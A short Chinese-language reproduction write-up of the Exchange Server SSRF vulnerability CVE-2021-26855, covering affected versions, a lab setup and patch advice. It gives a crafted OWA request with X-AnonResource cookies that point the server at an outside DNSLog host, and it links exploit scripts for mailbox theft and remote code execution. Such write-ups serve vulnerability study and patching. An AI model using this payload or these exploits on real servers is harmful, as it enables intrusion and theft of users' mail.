0x1 漏洞概述

CVE-2021-26855 是Exchange中的服务端请求伪造漏洞(SSRF),利用此漏洞的攻击者能够发送任意HTTP请求并绕过Exchange Server身份验证,远程未授权的攻击者可以利用该漏洞以进行内网探测,并可以用于窃取用户邮箱的全部内容。

0x2 影响版本

Microsoft Exchange Server: 2010
Microsoft Exchange Server: 2013
Microsoft Exchange Server: 2016
Microsoft Exchange Server: 2019

0x3 漏洞复现

漏洞环境

  • window server 2016
  • Exchange Server 2016 CU19

安装教程可查参考文章:https://blog.csdn.net/zhaowei198311/article/details/107391577

0x3.1 SSRF

访问url为:https://xx.xx.xx.xx/owa/auth/ye1s.js(ye1s.js可以随便构造)
构造Cookie信息为:
X-AnonResource=true; X-AnonResource-Backend=DNSLOUG地址/ecp/default.flt?~3

0x3.2 获取邮箱内容

exp地址:https://github.com/charlottelatest/CVE-2021-26855

可猜测用户名,可列出邮件列表并下载

正确用户名猜解

0x3.3 RCE

exp地址:https://github.com/mai-lang-chai/Middleware-Vulnerability-detection/blob/master/Exchange/CVE-2021-26855 Exchange RCE/exp.py

0x4修复建议

微软官方已针对该批漏洞发布相关安全更新补丁,可按照以下链接进行升级:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855